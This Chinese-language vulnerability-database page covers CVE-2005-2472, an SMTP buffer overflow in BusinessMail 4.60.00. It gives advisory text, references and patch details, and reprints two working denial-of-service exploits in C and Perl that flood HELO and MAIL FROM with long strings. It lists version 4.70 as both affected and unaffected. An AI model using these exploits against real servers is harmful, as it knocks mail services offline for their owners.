CVE-2005-2472
CVSS5.0
发布时间 :2005-08-05 00:00:00
修订时间 :2016-10-17 23:27:40
NMCOES    

[原文]Multiple buffer overflows in BusinessMail 4.60.00 allow remote attackers to cause a denial of service (application crash) via a long string to SMTP (1) HELO or (2) MAIL FROM commands.


[CNNVD]NetCPlus BusinessMail 多个远程缓冲区溢出漏洞(CNNVD-200508-057)

        BusinessMail 4.60.00存在多个缓冲区溢出漏洞。这使得远程攻击者可以借助于对SMTP的(1)HELO或(2)MAIL FROM命令的长字符串造成拒绝服务(应用程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2472
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2472
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-057
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035647.html
(PATCH)  FULLDISC  20050801 Buffer overflow in BusinessMail email server system 4.60.00
http://marc.info/?l=bugtraq&m=112291456305261&w=2
(UNKNOWN)  BUGTRAQ  20050801 Buffer overflow in BusinessMail email server system 4.60.00
http://reedarvin.thearvins.com/20050730-01.html
(PATCH)  MISC  http://reedarvin.thearvins.com/20050730-01.html
http://securitytracker.com/id?1014602
(UNKNOWN)  SECTRACK  1014602
http://www.securityfocus.com/bid/14434
(UNKNOWN)  BID  14434
http://xforce.iss.net/xforce/xfdb/21636
(UNKNOWN)  XF  businessmail-smtp-dos(21636)

- 漏洞信息

NetCPlus BusinessMail 多个远程缓冲区溢出漏洞
中危 缓冲区溢出
2005-08-05 00:00:00 2005-10-20 00:00:00
远程  
        BusinessMail 4.60.00存在多个缓冲区溢出漏洞。这使得远程攻击者可以借助于对SMTP的(1)HELO或(2)MAIL FROM命令的长字符串造成拒绝服务(应用程序崩溃)。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        NetcPlus BusinessMail 4.60
        NetcPlus bm470f.exe
        http://www.netcplus.com/pub/downloads/bm470f.exe

- 漏洞信息 (1126)

BusinessMail Server <= 4.60.00 Remote Denial of Service Exploit (EDBID:1126)
windows dos
2005-08-01 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

BusinessMail Server Remote Denial of Service Exploit by Kozan
( Based on Reed Arvin's code in perl )

Application: BusinessMail Server 4.60.00
Vendor: www.netcplus.com

Discovered by:  Reed Arvin
Exploit Coded by: Kozan
Credits to ATmaCA,  Reed Arvin
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32.lib")

char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char *argv[])
{
       fprintf(stdout, "BusinessMail Server Remote Denial of Service Exploit by Kozan\n");
       fprintf(stdout, "Discovered by: Reed Arvin\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA, Reed Arvin\n\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n");

       if(argc<2)
       {
               fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(25);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       fprintf(stdout, "Connecting to %s ...\n", argv[1]);

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Connected.\n");

       char szBuf1[1024], szBuf2[1024];

       wsprintf(szBuf1, "HELO %s\r\n", Buff);
       wsprintf(szBuf2, "MAIL FROM:%s\r\n", Buff);

       fprintf(stdout, "Sending HELO ...\n");

       if( send(sock,szBuf1,strlen(szBuf1),0) == -1 )
       {
               fprintf(stderr, "HELO string could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Sending MAIL FROM ...\n");

       if( send(sock,szBuf2,strlen(szBuf2),0) == -1 )
       {
               fprintf(stderr, "MAIL FROM string could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-08-01]
		

- 漏洞信息 (1164)

BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit (EDBID:1164)
windows dos
2005-07-30 Verified
0 Reed Arvin
N/A [点击下载]
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
#        BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";

        sleep(1);

        print $socket "HELO " . "A" x 512 . "\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====

# milw0rm.com [2005-07-30]
		

- 漏洞信息

18407
BusinessMail SMTP Multiple Command Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

BusinessMail SMTP contains a flaw that may allow a remote attacker to crash the service. The issue is due to the SMTP HELO and MAIL FROM commands not properly sanitizing user input. By providing overly long strings to either command, the service will crash requiring restart.

- 时间线

2005-08-01 Unknow
2005-08-01 Unknow

- 解决方案

Upgrade to version 4.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
Boundary Condition Error 14434
Yes No
2005-07-31 12:00:00 2007-06-04 08:50:00
Discovery is credited to Reed Arvin <reedarvin@gmail.com>.

- 受影响的程序版本

NetcPlus BusinessMail 4.60
NetcPlus BusinessMail 4.70

- 不受影响的程序版本

NetcPlus BusinessMail 4.70

- 漏洞讨论

BusinessMail is affected by multiple remote buffer-overflow vulnerabilities because the software fails to perform boundary checks. Remote attackers may be able to execute machine code in the context of the server process.

BusinessMail 4.60 is reportedly vulnerable; other versions may be affected as well.

- 漏洞利用

A proof of concept is available.

Currently we are not aware of any working exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 解决方案

The vendor reports that version 4.70 addresses this issue. Contact the vendor for more information.


NetcPlus BusinessMail 4.60

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站